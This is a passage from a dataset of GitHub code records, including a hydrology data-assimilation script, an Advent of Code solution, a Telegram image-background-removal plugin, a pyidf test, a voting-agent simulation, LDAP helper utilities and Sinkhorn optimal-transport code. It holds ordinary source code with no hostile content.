Qobscal})\n\n # Initialise GR2M model using calibrated parameters\n model.allocate(mthly.loc[idxcal, [\"Rain\", \"Evap\"]])\n\n # .. get calibrated parameters\n fp = fcalib / f\"calibration_{objfun_name}\" / \\\n f\"sim_{objfun_name}_{siteid}_{calperiod}.json\"\n with fp.open(\"r\") as fo:\n params = json.load(fo)\n\n X1 = params[\"PARAM_GR2M_X1\"]\n X2 = params[\"PARAM_GR2M_X2\"]\n Xr = 60.\n\n model.X1 = X1\n model.X2 = X2\n model.Xr = Xr\n\n model.initialise_fromdata()\n\n LOGGER.info(\"Run ENKS\")\n # .. create ensmooth object\n ensmooth = gr2m_ensmooth.EnSmooth(model, \\\n obscal, stdfacts, debug, nens)\n\n # .. configure plotting\n ensmooth.plot_dir = fimg\n ensmooth.plot_ax_size = (20, 3)\n ensmooth.plot_freq = 1000\n y1 = calp.active.end.year-5\n y2 = calp.active.end.year\n ensmooth.plot_period = [y1, y2]\n\n # .. initialise object\n ensmooth.initialise()\n\n context = f\"{siteid}_{objfun_name}_{calperiod}\"\n message = f\"EnSmooth {siteid} ({isite+1}/{nsites}) \"+\\\n f\"{objfun_name}-{calperiod}\"\n ensmooth.run(context, message)\n\n # Retrive key data from ensmooth\n nstates, nens, Xa = ensmooth.nstates_assim, ensmooth.nens, ensmooth.Xa\n sims0 = ensmooth.sims0\n transQ = ensmooth.transQ\n transP = ensmooth.transP\n transE = ensmooth.transE\n cols = [f\"Ens{iens:03d}\" for iens in range(nens)]\n iQ = ensmooth.assim_states.index(\"Q\")\n\n meta = {\n \"INFO_siteid\": int(siteid), \\\n \"INFO_calperiod\": calperiod, \\\n \"INFO_objfun\": objfun_name, \\\n \"INFO_nens\": nens, \\\n \"CONFIG_lamQ\": transQ.lam,\\\n \"CONFIG_nuQ\": transQ.nu,\\\n \"CONFIG_lamE\": transE.lam,\\\n \"CONFIG_nuE\": transE.nu,\\\n \"CONFIG_lamP\": transP.lam,\\\n \"CONFIG_nuP\": transP.nu,\\\n \"CONFIG_alphae\": alphae, \\\n \"PARAM_GR2M_X1\": X1, \\\n \"PARAM_GR2M_X2\": X2, \\\n \"PARAM_GR2M_Xr\": Xr\n }\n\n LOGGER.info(\"Store - Xa\")\n snames = ensmooth.assim_states\n nparams = 0 # no parameter assim\n\n # .. back transform corrected state data to\n # facilitate data interpretation\n if \"P\" in snames:\n iP = snames.index(\"P\")\n Xa[nparams+iP::nstates] = \\\n transP.backward(Xa[nparams+iP::nstates]) #P\n\n if \"P3\" in snames:\n iP3 = snames.index(\"P3\")\n Xa[nparams+iP3::nstates] = \\\n transP.backward(Xa[nparams+iP3::nstates]) #P3\n\n if \"E\" in snames:\n iE = snames.index(\"E\")\n Xa[nparams+iE::nstates] = \\\n transP.backward(Xa[nparams+iE::nstates]) #E\n\n if \"AE\" in snames:\n iAE = snames.index(\"AE\")\n Xa[nparams+iAE::nstates] = \\\n transE.backward(Xa[nparams+iAE::nstates]) #AE\n\n HXa = Xa[nparams+iQ::nstates]\n Xa[nparams+iQ::nstates] = transQ.backward(HXa) #Q\n Xa = pd.DataFrame(Xa, columns=cols)\n time = np.repeat(Qobs.index, nstates)\n Xa.loc[:, \"time\"] = time\n\n sn = np.repeat(np.array(snames)[None, :], len(HXa), axis=0).ravel()\n Xa.loc[:, \"state\"] = sn\n\n fn = f\"ensmooth_Xa_{siteid}_{calperiod}.csv\"\n fxa = fassim / fn\n comment = {\"comment\": \"Enks Xa data\"}\n comment.update(meta)\n csv.write_csv(Xa, fxa, comment, \\\n source_file, write_index=True)\n\n # Process openloop\n LOGGER.info(\"Store - Xf\")\n tend = (Xa.shape[0]-nparams)//nstates\n Xf = ensmooth.openloop(0, tend)\n\n if \"P\" in snames:\n Xf[iP::nstates] = transP.backward(Xf[iP::nstates]) #P\n\n if \"P3\" in snames:\n Xf[iP3::nstates] = transP.backward(Xf[iP3::nstates]) #P3\n\n if \"E\" in snames:\n Xf[iE::nstates] = transE.backward(Xf[iE::nstates]) #E\n\n if \"AE\" in snames:\n Xf[iAE::nstates] = transE.backward(Xf[iAE::nstates]) #AE\n\n HXf = Xf[iQ::nstates]\n Xf[iQ::nstates] = transQ.backward(HXf) #Q\n Xf = pd.DataFrame(Xf, columns=cols)\n Xf.loc[:, \"time\"] = time[nparams:]\n Xf.loc[:, \"state\"] = sn[nparams:]\n\n fn = f\"ensmooth_Xf_{siteid}_{calperiod}.csv\"\n fxf = fassim / fn\n comment = {\"comment\": \"Enks Xf data\"}\n comment.update(meta)\n csv.write_csv(Xf, fxf, comment, \\\n source_file, write_index=True)\n\n # HXa\n LOGGER.info(\"Store - HXa\")\n HXa = pd.DataFrame(HXa, index=Qobs.index, columns=cols)\n HXa.loc[:, \"Qobs\"] = Qobs\n HXa.loc[:, \"Qsim\"] = sims0.Q.values\n HXa.loc[:, \"P3sim\"] = sims0.P3.values\n HXa.loc[:, \"Ssim\"] = sims0.S.values\n HXa.loc[:, \"Rsim\"] = sims0.R.values\n HXa.loc[:, \"Rain\"] = model.inputs[:, 0]\n HXa.loc[:, \"Evap\"] = model.inputs[:, 1]\n\n HXa.loc[:, \"ISCAL\"] = 0\n HXa.loc[idxcal_active, \"ISCAL\"] = 1\n\n ens = HXa.filter(regex=\"Ens\", axis=1)\n obs = HXa.Qobs\n _, nrmse, ksp, pits = daisi_perf.ensemble_metrics(obs, ens)\n log10ksp = math.log10(max(1e-10, ksp))\n\n perfs.append({\"siteid\": siteid, \"calperiod\": calperiod, \\\n \"objfun\": objfun_name, \\\n \"nrmse\": nrmse, \"ksp\": ksp})\n\n LOGGER.info(f\"DAPERF: NR={nrmse:0.2f} KS={ksp:2.2e}\")\n\n fhxa = fxa.parent / f\"{re.sub('Xa', 'HXa', fxa.stem)}.csv\"\n comment = {\\\n \"comment\": \"Enks HXa data\", \\\n \"METRIC_CAL_NRMSERATIO-DA\": nrmse, \\\n \"METRIC_CAL_KSLOG10PV-DA\":log10ksp, \\\n }\n comment.update(meta)\n csv.write_csv(HXa, fhxa, comment, \\\n source_file, write_index=True)\n\n\n# Store results\nperfs = pd.DataFrame(perfs)\nfr = fout / f\"assim_results.csv\"\ncsv.write_csv(perfs, fr, \"Data Assimilation results\", \\\n source_file, compress=False, line_terminator=\"\\n\")\n\n\nLOGGER.info(\"Process completed\")\n\n","repo_name":"csiro-hydroinformatics/pydaisi","sub_path":"scripts/STEP1_data_assimilation.py","file_name":"STEP1_data_assimilation.py","file_ext":"py","file_size_in_byte":11066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36213486617","text":"with open(\"input\", \"r\") as input:\n lines = input.readlines()\n two_letters = 0\n three_letters = 0\n\n for line in lines:\n mod_2 = 0\n mod_3 = 0\n for i in range(ord('a'), ord('z') + 1):\n if line.count(str(chr(i))) == 2 and mod_2 == 0:\n two_letters += 1\n mod_2 = 1\n\n if line.count(str(chr(i))) == 3 and mod_3 == 0:\n three_letters += 1\n mod_3 = 1\n\nprint(two_letters * three_letters)\n ","repo_name":"Jokeswar/advent-of-code-2018","sub_path":"day-2/task-1.py","file_name":"task-1.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1215854936","text":"from Luna import CMD_HELP\nfrom Luna import tbot\nimport io\nimport os\nimport asyncio\nfrom datetime import datetime\n\nimport requests\nfrom telethon import types\nfrom telethon.tl import functions\nfrom Luna import REM_BG_API_KEY\nfrom Luna import TEMP_DOWNLOAD_DIRECTORY\nfrom Luna.events import bot as register\n\n@register(pattern=\"^/rmbg\")\nasync def _(event):\n HELP_STR = \"use `/rmbg` as reply to a media\"\n if event.fwd_from:\n return\n if REM_BG_API_KEY is None:\n await event.reply(\"You need API token from remove.bg to use this plugin.\")\n return False\n start = datetime.now()\n message_id = event.message.id\n if event.reply_to_msg_id:\n message_id = event.reply_to_msg_id\n reply_message = await event.get_reply_message()\n k = await event.reply(\"Processing...\")\n try:\n downloaded_file_name = await tbot.download_media(\n reply_message, TEMP_DOWNLOAD_DIRECTORY\n )\n except Exception as e:\n await event.reply(str(e))\n return\n else:\n output_file_name = ReTrieveFile(downloaded_file_name)\n os.remove(downloaded_file_name)\n else:\n await event.reply(HELP_STR)\n return\n contentType = output_file_name.headers.get(\"content-type\")\n if \"image\" in contentType:\n with io.BytesIO(output_file_name.content) as remove_bg_image:\n remove_bg_image.name = \"rmbg.png\"\n await tbot.send_file(\n event.chat_id,\n remove_bg_image,\n force_document=True,\n supports_streaming=False,\n allow_cache=False,\n reply_to=message_id,\n )\n await k.delete()\n end = datetime.now()\n ms = (end - start).seconds\n m = await event.reply(\"Background Removed in {} seconds\".format(ms))\n await asyncio.sleep(3)\n await m.delete()\n else:\n await event.reply(\n \"remove.bg API returned Errors. Please report to @lunabotsupport\\n`{}\".format(\n output_file_name.content.decode(\"UTF-8\")\n )\n )\n\n\ndef ReTrieveFile(input_file_name):\n headers = {\n \"X-API-Key\": REM_BG_API_KEY,\n }\n files = {\n \"image_file\": (input_file_name, open(input_file_name, \"rb\")),\n }\n r = requests.post(\n \"https://api.remove.bg/v1.0/removebg\",\n headers=headers,\n files=files,\n allow_redirects=True,\n stream=True,\n )\n return r\n\n\nfile_help = os.path.basename(__file__)\nfile_help = file_help.replace(\".py\", \"\")\nfile_helpo = file_help.replace(\"_\", \" \")\n\n__help__ = \"\"\"\n - /rmbg: Type in reply to a media to remove it's background\n\"\"\"\n\nCMD_HELP.update({file_helpo: [file_helpo, __help__]})\n","repo_name":"TheUnknownKanger/TimePassAssistantBot","sub_path":"Luna/modules/RMBG.py","file_name":"RMBG.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9799012658","text":"import os\nimport tempfile\nimport unittest\nimport logging\nfrom pyidf import ValidationLevel\nimport pyidf\nfrom pyidf.idf import IDF\nfrom pyidf.plant_heating_and_cooling_equipment import PlantComponentTemperatureSource\n\nlog = logging.getLogger(__name__)\n\nclass TestPlantComponentTemperatureSource(unittest.TestCase):\n\n def setUp(self):\n self.fd, self.path = tempfile.mkstemp()\n\n def tearDown(self):\n os.remove(self.path)\n\n def test_create_plantcomponenttemperaturesource(self):\n\n pyidf.validation_level = ValidationLevel.error\n\n obj = PlantComponentTemperatureSource()\n # alpha\n var_name = \"Name\"\n obj.name = var_name\n # node\n var_inlet_node = \"node|Inlet Node\"\n obj.inlet_node = var_inlet_node\n # node\n var_outlet_node = \"node|Outlet Node\"\n obj.outlet_node = var_outlet_node\n # real\n var_design_volume_flow_rate = 0.0001\n obj.design_volume_flow_rate = var_design_volume_flow_rate\n # alpha\n var_temperature_specification_type = \"Constant\"\n obj.temperature_specification_type = var_temperature_specification_type\n # real\n var_source_temperature = 6.6\n obj.source_temperature = var_source_temperature\n # object-list\n var_source_temperature_schedule_name = \"object-list|Source Temperature Schedule Name\"\n obj.source_temperature_schedule_name = var_source_temperature_schedule_name\n\n idf = IDF()\n idf.add(obj)\n idf.save(self.path, check=False)\n\n with open(self.path, mode='r') as f:\n for line in f:\n log.debug(line.strip())\n\n idf2 = IDF(self.path)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].name, var_name)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].inlet_node, var_inlet_node)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].outlet_node, var_outlet_node)\n self.assertAlmostEqual(idf2.plantcomponenttemperaturesources[0].design_volume_flow_rate, var_design_volume_flow_rate)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].temperature_specification_type, var_temperature_specification_type)\n self.assertAlmostEqual(idf2.plantcomponenttemperaturesources[0].source_temperature, var_source_temperature)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].source_temperature_schedule_name, var_source_temperature_schedule_name)","repo_name":"rbuffat/pyidf","sub_path":"tests/test_plantcomponenttemperaturesource.py","file_name":"test_plantcomponenttemperaturesource.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} +{"seq_id":"74113797655","text":"from agent import Agent\nimport numpy as np\nimport networkx as nx\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.animation\n\nclass IntelligentAgent():\n\n def __init__(self, conn_index, util_matrix):\n #agent index\n self.conn_index = conn_index\n self.util_matrix = util_matrix\n\n def MEU(self, conn_matrix, agents_decisions):\n \"\"\"\n \"\"\"\n utilities = []\n m, n = self.util_matrix.shape\n agent_count = len(conn_matrix[0, :])\n\n for decision_idx in range(m):\n utility = 0\n for i, conn_strength in enumerate(conn_matrix[self.conn_index, :]):\n other_agent_decision_idx = agents_decisions[i]\n utility += conn_strength * self.util_matrix[decision_idx, other_agent_decision_idx]\n\n utilities.append(utility)\n return np.argmax(utilities)\n\ndef update_agents_decision(conn_matrix, agents, agents_decisions):\n new_agents_decisions = []\n for i, decision in enumerate(agents_decisions): \n new_agents_decisions.append(\n agents[i].MEU(conn_matrix, agents_decisions)\n )\n #sanity check for animation update\n #new_agents_decisions[2] = np.random.randint(2, size=10)\n return new_agents_decisions\n\n\ndef animate(conn_matrix, agents, agents_decisions):\n G = nx.from_numpy_matrix(conn_matrix)\n pos = nx.spring_layout(G)\n n = len(conn_matrix[:, 0])\n fig, ax = plt.subplots(figsize=(6,4))\n \n def update(num):\n ax.clear()\n nonlocal agents_decisions\n color_map = []\n for x in agents_decisions:\n if x == 0: \n color_map.append(\"red\")\n elif x == 1:\n color_map.append(\"blue\")\n else:\n color_map.append(\"white\")\n \n nx.draw(\n G, pos, edge_color='black',width=1,linewidths=1,\\\n node_size=500, node_color = color_map , alpha=0.9,\\\n labels={node:node for node in G.nodes()}\n )\n\n edge_labels = {(j, i):conn_matrix[i, j] for j in range(n) for i in range(n)}\n nx.draw_networkx_edge_labels(G, pos, edge_labels=edge_labels, font_color='red')\n\n agents_decisions = update_agents_decision(conn_matrix, agents, agents_decisions)\n\n ani = matplotlib.animation.FuncAnimation(fig, update, interval=1000, repeat=True)\n plt.axis('off')\n plt.show()\n\n\ndef test():\n conn_matrix = np.array([\n [0, 2, 1], #ballot cast for self so inf\n [2, 0, 3], #influence/conn on self is zero since undecided\n [1, 3, 0] \n ])\n agents_decisions = np.array([\n 0, #dem vote\n -1, #curr agent undecided -- doenst really since self influence is zero on conn_matrix\n 1 #rep vote\n ])\n dominator = 100000\n #util matrix doesnt need to take into account utility of other agent\n #and so only needs be a 2x2 matrix\n und_util_matrix = np.array([\n [2, 1],\n [1, 1]\n ])\n rep_util_matrix = np.array([\n [0, 0],\n [dominator, dominator]\n ])\n dem_util_matrix = np.array([\n [dominator, dominator],\n [0, 0]\n ])\n\n agent_0 = IntelligentAgent(0, dem_util_matrix)\n agent_1 = IntelligentAgent(1, und_util_matrix)\n agent_2 = IntelligentAgent(2, rep_util_matrix)\n\n agents = [agent_0, agent_1, agent_2]\n\n assert agent_1.MEU(conn_matrix, agents_decisions) == 0\n assert np.allclose(update_agents_decision(conn_matrix, agents, agents_decisions), np.array([0, 0, 1]))\n print(\"SUCCESS: MEU\")\n\n animate(conn_matrix, agents, agents_decisions)\n\n\ntest()","repo_name":"tsor13/diffusion-of-information","sub_path":"IntelligentAgent.py","file_name":"IntelligentAgent.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18772777461","text":"import ldap,logging\n\n# URI format definition: http://tools.ietf.org/html/rfc4516.html\ndef initialize_source(uri,admin_dn,password):\n l = None\n try:\n l = ldap.initialize(uri)\n l.simple_bind_s(admin_dn,password)\n logging.info('LDAP: opened connection to %s binding as %s',uri,admin_dn)\n except Exception as e:\n logging.critical('LDAP: caught exception: %s',repr(e))\n logging.critical('LDAP: failed to open connection to %s binding as %s',uri,admin_dn)\n return l\n\n# create a DN for a CN by joining it to the base DN\n# there is probably a better method, but this works for extant test cases\ndef join_cn_base(base,cn):\n dn = 'CN=%s'%cn\n dn += ', ' + base\n return dn\n\n# delete a DN\ndef del_dn(ldap_source, dn):\n success = False\n try:\n result = ldap_source.delete_s(dn)\n success = True\n logging.info('LDAP: deleted %s',dn)\n except Exception as e:\n #import code; code.interact(local=locals())\n logging.critical('LDAP: caught exception: %s',e)\n logging.critical('LDAP: unable to delete %s',dn)\n return success\n\n# given a CN and base DN, delete the object\ndef del_cn(ldap_source, base_dn, cn):\n dn = join_cn_base(base_dn,cn)\n return del_dn(ldap_source,dn)\n\n# what gets opened must get closed\ndef close_source(ldap_source):\n uri = ldap_source._uri\n ldap_source.unbind_s()\n logging.info('LDAP: closed connection to %s',uri)\n\n#########################################################################\n# this stuff is all old / weird / should be deprecated #\n# it is only being kept for customer-maryland repo compat #\n# #\n# it should probably be using the accessor methods to parse return vals #\n# instead of crazy array / dict slicing #\n#########################################################################\ndef get_ldap_attr(o,ldfilter,attr,l):\n result = None\n temp = l.search_s(o,ldap.SCOPE_SUBTREE,ldfilter,['dn',attr])\n if temp!=None:\n try:\n result = temp[0][1][attr][0]\n except Exception as e:\n logging.debug('caught exception: %s',repr(e))\n logging.debug('no %s attribute for filter %s',attr,ldfilter)\n return result\n\ndef get_ldap_attr_by_cn(o,cn,attr,l):\n cnfilter = '(cn=%s)' % cn\n return get_ldap_attr(o,cnfilter,attr,l)\n\ndef get_cns_in_filter(o,ldfilter,l):\n cns = None\n results = l.search_s(o,ldap.SCOPE_SUBTREE,ldfilter,['cn','dn'])\n if temp!=None:\n try:\n cns = [x[1]['cn'][0] for x in results]\n except:\n logging.debug('caught exception: %s',repr(e))\n logging.debug('no matches for filter %s',ldfilter)\n return cns\n\ndef get_cns_in_edirgroup(o,group,l):\n group_filter = '(groupMembership=%s' % group\n return get_cns_in_filter(o,group_filter,l)\n#########################################################################\n#########################################################################\n","repo_name":"gfakes/vcloud","sub_path":"harbinger/general-et/ldaputils.py","file_name":"ldaputils.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14521974845","text":"import mkl_fft\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sp\nfrom scipy.spatial.distance import cdist\nfrom scipy.linalg import toeplitz\nfrom tqdm import tqdm\nimport IPython.display\nfrom time import time\n\n\ndef sinkhorn(X, Y, beta=0.01, max_iter=200, store_err=True, early_stopping=True, \n eps=1e-12, tol=1e-10, patience=10, verbose=True, plot_err=False, plot_mat=False,\n testtime=False, return_err=False):\n '''\n X, Y - datapoint of two distributions\n beta - regularization parameter \n \n return: K, a, b\n '''\n n, m = len(X), len(Y)\n C = cdist(X, Y)\n # C /= C.max()\n \n p = np.ones(n) / n\n q = np.ones(m) / m\n \n K = np.exp(-C / beta)\n Kt = K.T\n b = np.ones(m)\n \n i = 0\n j = 0\n err = [10]\n t = []\n print('Starting iterative process')\n \n for i in range(max_iter):\n with np.errstate(divide='ignore', invalid='ignore'):\n s = time()\n Kb = K.dot(b)\n a = np.divide(p, Kb)\n Kta = Kt.dot(a)\n b = np.divide(q, Kta)\n t.append(time() - s)\n if store_err:\n g0 = a * K.dot(b)\n g1 = b * Kt.dot(a)\n err.append(np.linalg.norm(g0 - p) + np.linalg.norm(g1 - q))\n ###########################################################\n if verbose == 2:\n print(f'{i:5.0f}: {err[-1]:.20f}')\n if plot_err == 2:\n IPython.display.clear_output(wait=True)\n plt.figure(figsize=(10,4))\n plt.title(f'error rate, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration, step {np.abs(err[-2] - err[-1]):.3e}')\n plt.semilogy(range(len(err)-1), err[1:])\n plt.show()\n \n if early_stopping:\n # if good enough\n if err[-1] < eps:\n if verbose:\n print(f'#iterations={i+1}, early stopping: eps, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n # if no improvements\n if np.abs(err[-2] - err[-1]) < tol:\n j += 1\n if j > patience:\n if verbose:\n print(f'#iterations={i+1}, early stopping: tol, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n else:\n j = 0\n else:\n if verbose:\n print(f'#iterations={i+1}, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n if store_err and plot_err == 1:\n plt.figure(figsize=(10,4))\n plt.subplot(121)\n plt.title('error')\n plt.semilogy(range(len(err)-1), err[1:])\n if plot_mat: plt.subplot(122)\n elif plot_mat:\n plt.figure(figsize=(5,4))\n if plot_mat:\n plt.title('optimal transport matrix')\n plt.imshow(a.reshape(-1,1) * K * b.reshape(1,-1))\n if plot_mat or plot_err: plt.show()\n method='sinkhorn'\n np.save(f'K_{method}.npy', K)\n np.save(f'a_{method}.npy', a)\n np.save(f'b_{method}.npy', b)\n if testtime:\n if return_err:\n return K, a, b, t, err\n else:\n return K, a, b, t\n else:\n if return_err:\n return K, a, b, err\n else:\n return K, a, b\n\ncenters = lambda edges: (edges[:,:-1] + edges[:,1:]) / 2\n\ndef binning(X, Y, bin_size):\n '''\n X, Y: nd.array,\n data points of two distributions\n bin_size: int,\n number of bins (equal for each dimension!)\n '''\n \n clouds = np.vstack([X, Y])\n \n grid = np.linspace(np.min(clouds, 0), np.max(clouds, 0), bin_size + 1).T # [Dimension, Bins]\n \n mesh = np.meshgrid(*centers(grid), indexing='xy')\n bins = np.hstack([x.reshape(-1,1) for x in mesh])\n \n p, _ = np.histogramdd(X, bins=grid)\n q, _ = np.histogramdd(Y, bins=grid)\n p /= p.sum()\n q /= q.sum()\n \n return bins, p, q\n\nis_pow_2 = lambda x: x == 2 ** int(np.log2(x))\n\nclass Toeplitz(object):\n '''Class for utilizing Toeplitz matrix (assume it is symmetric and has block-level no more than 3)'''\n def __init__(self, top, size=None):\n '''\n \n top: nd.array, \n the first row of the matrix, that defines the matrix; if 'size' is None, then assume that \n shape of the array defines the block-level structure.\n size: tuple of int or None, \n defines block-level structure, i.e. number of dimensions equals to level of matrix,\n each size of dimension is number of blocks of each level and size of last dimension is block size.\n Any size needs to be a power of 2.\n '''\n self.top = top if size is None else top.reshape(size)\n self.size = top.shape if size is None else size\n self.dim = len(self.size)\n self.area = tuple(slice(s) for s in self.size)\n self.pad = tuple((0, s) for s in self.size)\n \n assert all([is_pow_2(s) for s in self.size]), 'sizes need to be powers of 2'\n \n self.embedding = self.make_embedding(self.top)\n self.circ_fft = mkl_fft.fftn(self.embedding)\n \n def make_embedding(self, top):\n blocks = top\n for i in range(-1, -self.dim - 1, -1):\n zeros_size = list(self.size)\n for j in range(i, 0):\n if j == i:\n zeros_size[j] = 1\n else:\n zeros_size[j] *= 2\n slice_ = [slice(None) for _ in range(self.dim)]\n slice_[i] = slice(None, 0, -1)\n blocks = np.concatenate([blocks, np.zeros(zeros_size), blocks[tuple(slice_)]], i)\n return blocks\n \n def matvec(self, x, debug=True):\n ''' fast \"matvec\" multiplication '''\n if x.ndim > 1:\n if (x.shape[0] == 1 or x.shape[1] == 1):\n x = x.ravel()\n else:\n raise ValueError()\n x_fft = mkl_fft.fftn(np.pad(x.reshape(self.size), self.pad))\n if debug:\n print('*'*100)\n print('circ_fft\\n', self.circ_fft)\n print('x_fft\\n', x_fft)\n print('multiplication\\n', self.circ_fft * x_fft)\n print('ifft\\n', mkl_fft.ifftn(self.circ_fft * x_fft))\n print('result\\n', np.abs(mkl_fft.ifftn(np.multiply(self.circ_fft, x_fft))[self.area]).ravel())\n print('*'*100)\n return np.real(mkl_fft.ifftn(np.multiply(self.circ_fft, x_fft))[self.area]).ravel()\n \n def full(self):\n ''' \n return full matrix np.exp(-C / beta) without recomputation\n actually just the way to construct BTTB matrix of level 1, 2, 3 (N can be done also)\n '''\n if self.dim == 1:\n return toeplitz(self.top)\n if self.dim == 2:\n blocks = np.array([toeplitz(c) for c in self.top])\n elif self.dim == 3:\n Bblocks = [[toeplitz(c) for c in top2level] for top2level in self.top]\n blocks = np.array([np.block([[*blocks]] + [[*blocks[slice(i, 0, -1)], *blocks[slice(0,-i)]] \\\n for i in range(1, len(blocks))]) for blocks in Bblocks])\n else:\n raise NotImplementedError()\n return np.block([[*blocks]] + [[*blocks[slice(i, 0, -1)], *blocks[slice(0,-i)]] for i in range(1, len(blocks))])\n \n def distance_matrix(self, beta, full=None):\n return - beta * np.log(self.full() if full is None else full)\n \n def sinkhorn_distance(self, a, b, beta):\n ''' пока что полная матрица используется '''\n K = self.full\n return np.sum(a * K * b.reshape(1, -1) * self.distance_matrix(beta, K))\n\n\ndef sinkhorn_toeplitz(X, Y, bin_size, beta=0.01, max_iter=200,\n warm_start=None,\n early_stopping=True, eps=1e-12, tol=1e-10, patience=10, \n verbose=True, store_err=True, plot=0, \n debug=False, debug_=False, testtime=False, return_err=False):\n '''\n Arguments\n \n X, Y:\n ndarray:\n if bin_size is int: datapoints of two distributions\n if bin_size is ndarray: mass distibutions over bins for two distributions\n bin_size:\n int: number of bins (equal for each dimension) foo binning,\n ndarray: array of size [N, D] with coordinates of bin centers\n beta:\n float: entropy regularization parameter \n max_iter:\n int: maximal number of iterations\n warm_start:\n (ndarray, ndarray): a, b to start with\n early_stopping:\n bool: whether to stop iterations if the error $E(\\gamma)$ value \n matches the conditions (eps, tol, patience):\n $E(\\gamma) = ||\\gamma @ 1 - p||_2 + ||\\gamma^T @ 1 - q||_2\n eps:\n float: stops iterations if $E(\\gamma)$ < eps\n tol:\n float: stops after |patience| iterations with $E(\\gamma)_i - $E(\\gamma)_{i-1}$ < tol\n patience:\n int: number of iterations that can be computed with tol progress until early stopping\n verbose:\n 0, 1, 2 (or bool): controls the verbosity:\n 0 (False): nothing to be printed\n 1 (True): print stopping criteria or/and final error\n 2: print every iteration error\n store_err:\n bool: whether to calculate $E(\\gamma)$ (if False, then early_stopping is ignored)\n plot:\n 0, 1, 2 (or bool): whether to plot error linegraph (if store_err is True)\n 0 (False): nothing to be plotted\n 1 (True): one plot after finished iteration process\n 2: real-time plot during iteration process\n \n Return\n K: \n Toeplitz\n a, b, bins, p, q:\n ndarrays, (B, 1), (B, 1), (B, d), (B, 1), (B, 1), where B is overall number of bins\n \n '''\n if isinstance(bin_size, int):\n bins, p, q = binning(X, Y, bin_size)\n elif isinstance(bin_size, np.ndarray):\n bins, p, q = bin_size.copy(), X.copy(), Y.copy()\n p /= p.sum()\n q /= q.sum()\n else:\n raise ValueError()\n \n size = p.shape\n p = p.ravel() + 1e-15\n q = q.ravel() + 1e-15\n top = cdist(bins[0].reshape(1, -1), bins) # O(B)\n # top /= top.max()\n K = Toeplitz(np.exp(- top / beta), size)\n if debug_:\n C = cdist(bins, bins)\n K_ = np.exp(-C / beta)\n if warm_start is None:\n b = np.ones(np.prod(size))\n else:\n a, b = warm_start\n \n i = 0\n j = 0\n err = [10]\n t = []\n print('Starting iterative process')\n \n for i in range(max_iter):\n \n with np.errstate(divide='raise', over='raise', under='raise'):\n try:\n if debug or debug_:\n print(f'ITERATION {i}')\n print('-'*100)\n s = time()\n if debug: print('MATVEC by b\\n b =\\n', b)\n Kb = K.matvec(b, debug) # O(B log B)\n if debug_:\n K_b = K_ @ b\n print('.'*100)\n print(\"\\nISCLOSE TO REAL MATVEC:\", np.all(np.isclose(K_b, Kb, 1e-10)), \n '\\n\\tabs(diff).mean', np.abs(K_b - Kb).mean(),\n '\\n\\tabs(diff).mean / abs(K_b).mean', np.abs(K_b - Kb).mean() / np.abs(K_b).mean())\n print('.'*100)\n \n if debug: print(f'DIVIDING p by K.b\\n p =\\n{p}\\n K.b =\\n', Kb)\n a = np.divide(p, Kb)\n if debug: print('MATVEC by a\\n a =\\n', a)\n Ka = K.matvec(a, debug) # O(B log B)\n \n if debug_:\n K_a = K_ @ a\n print('.'*100)\n print(\"\\nISCLOSE TO REAL MATVEC:\", np.all(np.isclose(K_a, Ka, 1e-10)), \n '\\n\\tabs(diff).mean', np.abs(K_a - Ka).mean(),\n '\\n\\tabs(diff).mean / abs(K_a).mean', np.abs(K_a - Ka).mean() / np.abs(K_a).mean())\n print('.'*100)\n \n if debug: print(f'DIVIDING q by K.a\\n q =\\n{q}\\n K.a =\\n', Ka) \n b = np.divide(q, Ka)\n if debug: print('-'*100)\n t.append(time() - s)\n except FloatingPointError as e:\n if verbose:\n print(e)\n print(f'#iterations={i+1}, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f}ms per iteration')\n break\n \n if store_err:\n with np.errstate(divide='raise', over='raise', under='raise'):\n try:\n g0 = a * (K.matvec(b, debug))\n g1 = b * (K.matvec(a, debug))\n except:\n pass\n err.append(np.linalg.norm(g0 - p) + np.linalg.norm(g1 - q))\n ###########################################################\n if verbose == 2:\n print(f'{i:5.0f}: {err[-1]:.20f}')\n if plot == 2:\n IPython.display.clear_output(wait=True)\n plt.figure(figsize=(10,4))\n plt.title(f'error rate, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration, step {np.abs(err[-2] - err[-1]):.3e}')\n plt.semilogy(range(len(err)-1), err[1:])\n plt.savefig('error.png')\n plt.close()\n \n if early_stopping:\n # if good enough\n if err[-1] < eps:\n if verbose:\n print(f'#iterations={i+1}, early stopping: eps, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n # if no improvements\n if np.abs(err[-2] - err[-1]) < tol:\n j += 1\n if j > patience:\n if verbose:\n print(f'#iterations={i+1}, early stopping: tol, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} 